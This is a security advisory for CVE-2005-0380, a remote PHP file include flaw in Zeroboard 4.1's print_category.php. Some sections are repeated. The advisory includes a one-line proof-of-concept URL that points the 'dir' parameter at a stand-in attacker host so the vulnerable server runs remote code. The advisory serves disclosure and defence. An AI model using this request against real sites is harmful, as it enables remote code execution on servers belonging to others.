Zeroboard Print_Category.PHP Remote File Include Vulnerability
BID:12258
Info
Zeroboard Print_Category.PHP Remote File Include Vulnerability
| Bugtraq ID: | 12258 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-0380 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 13 2005 12:00AM |
| Updated: | Jul 12 2009 09:27AM |
| Credit: | Discovery of this vulnerability is credited to Jeremy Bae at STG Security. |
| Vulnerable: |
Zeroboard Zeroboard 4.1 pl5 Zeroboard Zeroboard 4.1 pl4 Zeroboard Zeroboard 4.1 pl3 Zeroboard Zeroboard 4.1 pl2 |
| Not Vulnerable: | |
Discussion
Zeroboard Print_Category.PHP Remote File Include Vulnerability
Zeroboard is reportedly affected by a remote PHP file include vulnerability. This issue is due to the application failing to properly sanitize user-supplied input to 'print_category.php'.
Remote attackers could potentially exploit this issue via the 'dir' variable to include a remote malicious PHP script, which will be executed in the context of the Web server hosting the vulnerable software.
Zeroboard is reportedly affected by a remote PHP file include vulnerability. This issue is due to the application failing to properly sanitize user-supplied input to 'print_category.php'.
Remote attackers could potentially exploit this issue via the 'dir' variable to include a remote malicious PHP script, which will be executed in the context of the Web server hosting the vulnerable software.
Exploit / POC
Zeroboard Print_Category.PHP Remote File Include Vulnerability
No exploit is required and the following proof of concept is available:
http://www.example.com/[zeroboard]/include/print_category.php?setup[use_category]=1&dir=http://[attacker]/
No exploit is required and the following proof of concept is available:
http://www.example.com/[zeroboard]/include/print_category.php?setup[use_category]=1&dir=http://[attacker]/
Solution / Fix
Zeroboard Print_Category.PHP Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Zeroboard Print_Category.PHP Remote File Include Vulnerability
References:
References: